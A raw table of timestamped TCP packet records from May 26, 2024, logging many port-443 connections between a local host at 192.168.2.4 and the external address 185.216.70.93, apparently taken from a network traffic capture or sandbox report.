May 26, 2024 00:17:18.927057981 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:18.945230007 CEST	49778	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.961206913 CEST	49779	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.971544027 CEST	49781	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:18.977210999 CEST	49780	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.097971916 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.098002911 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.098014116 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.098033905 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.098067045 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.098140001 CEST	49776	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.098169088 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.098181963 CEST	49776	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.098212957 CEST	49776	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.100414991 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.100475073 CEST	49776	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.100482941 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.100518942 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.100559950 CEST	49776	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.104599953 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.104625940 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.104650974 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.104660988 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.104685068 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.104701042 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.104723930 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.104747057 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.111426115 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.111496925 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.111542940 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.111550093 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.111577988 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.157162905 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.216509104 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.216526031 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.216562986 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.216644049 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.216665030 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.216694117 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.216711044 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.219857931 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.219907999 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.219914913 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.219933033 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.219949961 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.219978094 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.366238117 CEST	49781	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.366272926 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.366539001 CEST	49780	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.366569996 CEST	443	49780	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.366792917 CEST	49779	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.366815090 CEST	443	49779	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.367047071 CEST	49778	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.367060900 CEST	443	49778	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.367337942 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.367372036 CEST	49777	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.367384911 CEST	443	49777	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.367403984 CEST	49781	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.367535114 CEST	443	49780	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.367547035 CEST	443	49780	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.367587090 CEST	49780	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.367794037 CEST	443	49778	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.367794991 CEST	443	49777	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.368136883 CEST	49781	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.368207932 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.368695974 CEST	49780	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.368762016 CEST	443	49780	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.369028091 CEST	49777	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.369088888 CEST	443	49777	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.369319916 CEST	49778	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.369488955 CEST	443	49778	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.369657040 CEST	49781	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.369672060 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.369714022 CEST	49780	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.369725943 CEST	443	49780	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.369750977 CEST	49777	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.370158911 CEST	49778	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.370455980 CEST	443	49779	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.370526075 CEST	49779	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.377140999 CEST	49779	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.377280951 CEST	49779	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.377458096 CEST	443	49779	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.410507917 CEST	443	49778	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.410520077 CEST	443	49777	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.418521881 CEST	49781	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.418521881 CEST	49780	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.420268059 CEST	49779	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.420285940 CEST	443	49779	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.468400955 CEST	49779	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.581445932 CEST	443	49777	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.581465006 CEST	443	49777	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.581532955 CEST	443	49777	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.581556082 CEST	49777	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.581584930 CEST	49777	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.585505009 CEST	443	49778	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.585525990 CEST	443	49778	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.585582972 CEST	49778	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.585587978 CEST	443	49778	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.585628986 CEST	49778	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.592084885 CEST	443	49779	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.592149019 CEST	443	49779	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.592170954 CEST	443	49779	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.592210054 CEST	49779	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.592226982 CEST	443	49779	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.592243910 CEST	49779	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.592327118 CEST	443	49779	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.592374086 CEST	49779	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.592705965 CEST	443	49780	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.592725039 CEST	443	49780	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.592731953 CEST	443	49780	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.592749119 CEST	443	49780	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.592756033 CEST	443	49780	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.592787981 CEST	49780	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.592797995 CEST	443	49780	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.592855930 CEST	49780	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.592855930 CEST	49780	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.698354959 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.698378086 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.698385000 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.698409081 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.698427916 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.698436975 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.698441029 CEST	49781	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.698453903 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.698483944 CEST	49781	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.698498964 CEST	49781	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.708442926 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.708498955 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.708524942 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:19.708549023 CEST	49781	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:19.708601952 CEST	49781	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.313242912 CEST	49771	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.313276052 CEST	443	49771	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.316838026 CEST	49775	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.316925049 CEST	443	49775	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.317200899 CEST	49784	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.317295074 CEST	443	49784	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.317378044 CEST	49784	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.317692041 CEST	49784	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.317728996 CEST	443	49784	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.317794085 CEST	49776	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.317807913 CEST	443	49776	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.318105936 CEST	49785	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.318125963 CEST	443	49785	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.318182945 CEST	49785	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.318355083 CEST	49774	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.318372011 CEST	443	49774	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.318625927 CEST	49786	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.318645000 CEST	443	49786	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.318710089 CEST	49786	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.319118977 CEST	49773	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.319132090 CEST	443	49773	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.319380999 CEST	49772	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.319395065 CEST	443	49772	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.319830894 CEST	49785	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.319858074 CEST	443	49785	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.320182085 CEST	49786	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.320207119 CEST	443	49786	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.331763983 CEST	49781	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.331794977 CEST	443	49781	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.332087994 CEST	49787	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.332108974 CEST	443	49787	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.332179070 CEST	49787	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.332551956 CEST	49780	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.332559109 CEST	443	49780	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.332802057 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.332864046 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.332922935 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.333811998 CEST	49778	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.333825111 CEST	443	49778	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.334064007 CEST	49777	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.334069014 CEST	443	49777	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.334300041 CEST	49779	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.334306002 CEST	443	49779	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.334513903 CEST	49789	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.334523916 CEST	443	49789	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.334580898 CEST	49789	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.335140944 CEST	49787	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.335169077 CEST	443	49787	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.335510969 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.335526943 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.336049080 CEST	49789	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.336065054 CEST	443	49789	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.400268078 CEST	49791	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.400295973 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:21.400355101 CEST	49791	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.401374102 CEST	49791	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:21.401391029 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.011221886 CEST	443	49784	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.011595011 CEST	49784	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.011627913 CEST	443	49784	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.012731075 CEST	443	49784	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.013178110 CEST	49784	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.013324976 CEST	49784	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.013349056 CEST	443	49784	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.021169901 CEST	443	49786	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.021387100 CEST	49786	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.021397114 CEST	443	49786	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.022428036 CEST	443	49786	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.022501945 CEST	49786	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.022806883 CEST	49786	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.022917986 CEST	443	49786	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.022963047 CEST	49786	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.028004885 CEST	443	49785	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.028191090 CEST	49785	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.028199911 CEST	443	49785	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.028609991 CEST	443	49785	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.029046059 CEST	49785	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.029128075 CEST	443	49785	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.029432058 CEST	49785	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.066505909 CEST	443	49786	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.074497938 CEST	443	49785	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.088958979 CEST	443	49787	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.089236975 CEST	49787	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.089246988 CEST	443	49787	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.090260983 CEST	443	49787	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.090317965 CEST	49787	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.090648890 CEST	49787	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.090708971 CEST	443	49787	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.090787888 CEST	49787	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.090796947 CEST	443	49787	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.096347094 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.096541882 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.096570015 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.098154068 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.098215103 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.098505974 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.098593950 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.098618984 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.103486061 CEST	443	49789	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.103660107 CEST	49789	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.103681087 CEST	443	49789	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.104571104 CEST	443	49789	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.104629040 CEST	49789	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.105062962 CEST	49789	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.105115891 CEST	443	49789	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.105137110 CEST	49784	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.105289936 CEST	49789	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.105299950 CEST	443	49789	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.141112089 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.141374111 CEST	49791	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.141397953 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.141717911 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.143198013 CEST	49791	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.143260956 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.143605947 CEST	49791	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.146497965 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.190500021 CEST	443	49791	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.198920012 CEST	49786	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.198950052 CEST	443	49786	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.198988914 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.199013948 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.214565992 CEST	49787	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.216339111 CEST	49789	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.308252096 CEST	49786	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.308346987 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.341243982 CEST	443	49784	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.341308117 CEST	443	49784	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.341368914 CEST	49784	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.341382980 CEST	443	49784	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.341465950 CEST	49784	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.341471910 CEST	443	49784	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.341521025 CEST	49784	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.342833042 CEST	49784	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.342854977 CEST	443	49784	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.343147039 CEST	49794	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.343183994 CEST	443	49794	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.343241930 CEST	49794	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.343736887 CEST	49794	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.343748093 CEST	443	49794	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.348690987 CEST	443	49786	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.348716974 CEST	443	49786	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.348725080 CEST	443	49786	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.348784924 CEST	443	49786	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.348793030 CEST	49786	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.348830938 CEST	49786	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.349790096 CEST	49786	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.349796057 CEST	443	49786	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.350076914 CEST	49795	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.350087881 CEST	443	49795	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.350159883 CEST	49795	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.350553989 CEST	49795	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.350563049 CEST	443	49795	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.442652941 CEST	443	49787	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.442672968 CEST	443	49787	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.442679882 CEST	443	49787	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.442739964 CEST	443	49787	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.442769051 CEST	49787	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.442841053 CEST	49787	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.444257975 CEST	49787	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.444300890 CEST	443	49787	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.444713116 CEST	49796	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.444762945 CEST	443	49796	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.444842100 CEST	49796	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.445467949 CEST	49796	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.445487022 CEST	443	49796	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.456262112 CEST	443	49789	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.456298113 CEST	443	49789	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.456314087 CEST	443	49789	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.456362963 CEST	49789	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.456393957 CEST	443	49789	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.456418037 CEST	443	49789	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.456480980 CEST	49789	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.457355022 CEST	49789	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.457379103 CEST	443	49789	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.457798004 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.457832098 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.457890987 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.458374023 CEST	49797	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.458395004 CEST	443	49797	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.464335918 CEST	443	49785	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.464365005 CEST	443	49785	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.464485884 CEST	49785	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.464549065 CEST	443	49785	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.464638948 CEST	49785	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.470828056 CEST	443	49785	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.470907927 CEST	49785	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.470921993 CEST	443	49785	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.470944881 CEST	443	49785	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.470990896 CEST	49785	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.471354961 CEST	49785	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.471383095 CEST	443	49785	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.471690893 CEST	49798	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.471728086 CEST	443	49798	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.471792936 CEST	49798	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.472743034 CEST	49798	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.472759008 CEST	443	49798	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.540714979 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.540785074 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.540810108 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.540832043 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.540846109 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.540882111 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.540899992 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.540901899 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.540924072 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.540941954 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.540957928 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.540972948 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.541001081 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.555408001 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.555428982 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.555447102 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.555468082 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.555497885 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.555515051 CEST	49788	443	192.168.2.4	185.216.70.93
May 26, 2024 00:17:22.555516958 CEST	443	49788	185.216.70.93	192.168.2.4
May 26, 2024 00:17:22.555533886 CEST	443	49788	185.216.70.93	192.168.2.4
